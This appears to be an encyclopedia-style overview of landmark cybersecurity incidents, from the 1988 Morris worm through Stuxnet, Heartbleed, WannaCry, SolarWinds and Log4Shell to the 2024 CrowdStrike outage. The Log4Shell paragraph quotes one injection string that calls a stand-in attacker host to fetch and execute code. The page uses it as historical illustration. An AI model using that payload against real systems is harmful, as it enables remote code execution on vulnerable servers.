A History of Cybersecurity

On the night of 2 November 1988 a worm released by Cornell graduate student Robert Tappan Morris chained vulnerabilities in sendmail, fingerd, and rsh to self-replicate across the early Internet, taking down an estimated 6,000 of roughly 60,000 hosts — around 10% of the network. A miscalibrated fork rate meant a single host could run many copies at once, effectively halting the entire network. In 1989 Morris became the first person prosecuted under the 1986 Computer Fraud and Abuse Act (CFAA) and was convicted in 1990. The incident drove DARPA to create the CERT Coordination Center, founding the discipline of computer-security incident response.

Read more →

In June 2010 analysts at VirusBlokAda, a Belarusian anti-virus vendor, found unusual malware on an Iranian customer's systems. Joint analysis by Symantec, Kaspersky, and Ralph Langner's team then exposed the full picture. Stuxnet combined four zero-days, stolen legitimate digital signatures (Realtek, JMicron), and deep knowledge of Windows plus the Siemens Step7/WinCC PLC toolchain to physically damage uranium-enrichment centrifuges at Iran's Natanz facility. Widely attributed to a joint US NSA / Israeli Unit 8200 operation codenamed Olympic Games, it is estimated to have wrecked about 1,000 IR-1 centrifuges. As the first known instance of a state using malware to cause physical destruction, it fundamentally redefined what cyber warfare means.

Read more →

On 5 June 2013 *The Guardian* published Glenn Greenwald's story revealing NSA bulk collection of Verizon call metadata. On 6 June *The Guardian* and *The Washington Post* simultaneously broke PRISM — a program collecting data directly from Google, Facebook, Apple and others. The source, soon visible on video from a Hong Kong hotel, was **Edward Snowden**, a 29-year-old NSA contractor at Booz Allen Hamilton. Over the following months more than 200,000 documents would surface, exposing XKeyscore, Bullrun (the campaign against encryption), MUSCULAR (taps on Google–Yahoo data-centre fibre), GCHQ's Tempora, and the interception of allied heads of state. Snowden fled via Hong Kong to Moscow, where as of 2026 he still lives. The disclosures set off the global privacy debate, drove mainstream end-to-end encryption (Signal, WhatsApp), the HTTPS Everywhere push, and the broader critique of surveillance capitalism.

Read more →

On 7 April 2014 a buffer-over-read vulnerability in OpenSSL's heartbeat extension — **CVE-2014-0160**, branded **Heartbleed** — was disclosed. Found independently and nearly simultaneously by Codenomicon and Google Security's Neel Mehta, it let an attacker repeatedly read up to 64 KB of a server's memory, leaking private keys, session cookies, and user passwords. The bug had shipped in OpenSSL 1.0.1 in March 2012 and remained unpatched for two years. With Apache and nginx then serving more than two-thirds of the web, most of the public Internet was within scope. Heartbleed exposed the structural fragility of having critical OSS maintained by tiny, unpaid teams; it led to the Linux Foundation's **Core Infrastructure Initiative** (later OpenSSF), to OpenBSD's **LibreSSL** fork, and to Google's **BoringSSL**.

Read more →

On 12 May 2017 the WannaCry ransomware encrypted an estimated 300,000 Windows machines in 150 countries. Its propagation engine was **EternalBlue**, an NSA exploit targeting the SMBv1 flaw MS17-010 / CVE-2017-0144, which had been dumped by the **Shadow Brokers** on 14 April 2017. Microsoft had released a patch on 14 March 2017, but vast numbers of unpatched hosts remained worldwide. Britain's National Health Service was hit hard: hospitals diverted ambulances and cancelled scheduled surgery. About seven hours into the outbreak, 22-year-old British researcher **Marcus Hutchins (MalwareTech)** found and registered a kill-switch domain (`iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com`) embedded in the code, halting the spread. The US and UK governments later formally attributed the attack to North Korea's **Lazarus Group**.

Read more →

On 13 December 2020 the security firm **FireEye** (later Mandiant) and Microsoft disclosed that Russia's **SVR** foreign-intelligence service — known to Western agencies as APT29 / Cozy Bear, later "Midnight Blizzard" — had implanted the **SUNBURST backdoor** into the legitimate build pipeline of **SolarWinds Orion**, a widely deployed network-management product. Trojaned Orion updates (versions 2019.4 HF5 through 2020.2.1) were distributed between March and June 2020 and downloaded by **about 18,000 organisations**. A smaller cluster of several hundred organisations was then targeted for deeper intrusion, including **nine US federal agencies** (Treasury, DHS, State, Justice, Commerce, Energy, NIH, NTIA, and others) and major vendors such as Microsoft, Cisco, FireEye, and Mimecast. The case is also notable because FireEye discovered the campaign on itself — a top-tier security company that the attackers had tried, and failed, to use as a stepping stone. It remains the canonical large-scale software supply-chain attack.

Read more →

On 24 November 2021 Chen Zhaojun of Alibaba Cloud's security team reported a remote-code-execution vulnerability in Apache Log4j 2.x's JNDI lookup feature — later **CVE-2021-44228**, CVSS 10.0 — to the Apache Software Foundation. On 9 December a proof-of-concept leaked on Twitter and the ASF released the emergency patch (Log4j 2.15.0). The exploit was trivially simple: any attacker-controlled string of the form `${jndi:ldap://attacker.com/x}` that ended up in a log statement would cause the server to fetch and execute Java bytecode from the attacker. The first widely shared demonstration used the chat box of Minecraft (Java Edition) to hijack other players' servers. The blast radius was on the order of billions of machines: Log4j is the de-facto standard logger of the Java ecosystem, embedded inside Apache, Twitter, Apple iCloud, Steam, Tencent QQ, Amazon, IBM, Oracle, and virtually every other major Java stack. The White House convened an emergency open-source security summit and accelerated SBOM mandates; CISA ordered US federal agencies into unprecedented end-of-year remediation.

Read more →

On 19 July, a faulty update file (Channel File 291) distributed by the cybersecurity firm CrowdStrike's Falcon Sensor sent an estimated 8.5 million Windows machines worldwide into bootloop / blue-screen failure. Airline flights (Delta cancelled about 7,000 flights, with reported losses of US$500 million), hospitals, bank ATMs, emergency response systems, and broadcasters were simultaneously taken down. Total estimated economic loss exceeded US$10 billion, the largest of any single IT outage. Recovery required manual boot into Safe Mode; many organisations needed days to weeks. The incident exposed, at global scale, the supply-chain risk of SaaS security products and the weakness of software validation processes.

Related organizations

Microsoft Corporation

Appears in

A General History of Information Technology · A History of Cloud Computing

Read more →